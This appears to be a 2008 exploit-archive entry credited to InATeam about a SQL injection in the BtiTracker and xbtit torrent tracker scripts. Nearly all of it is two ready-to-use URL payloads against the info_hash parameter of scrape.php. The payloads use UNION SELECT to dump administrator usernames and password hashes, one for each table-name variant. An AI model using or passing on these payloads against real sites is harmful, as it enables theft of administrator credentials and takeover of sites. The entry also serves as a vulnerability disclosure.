BtiTracker <= 1.4.7, xbtit <= 2.0.542 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BtiTracker <= 1.4.7, xbtit <= 2.0.542 SQL Injection Vulnerability
# Published : 2008-08-25
# Author : InATeam
# Previous Title : MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (2)
# Next Title : Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities

## BtiTracker/xBtiTracker Remote SQL Injection Vulnerability
## Author: InATeam (http://inattack.ru/)
## Affected versions: BtiTracker <= 1.4.7, xBtiTracker <= 2.0.542
## Software site: http://www.btiteam.org/
##
## ==============================================================================
## Exploit:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+users+WHERE+id_level=8/*
## ==============================================================================
## for xBtiTracker we need to specify prefix:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+xbtit_users+WHERE+id_level=8/*
## ==============================================================================

# www.Syue.com [2008-08-25]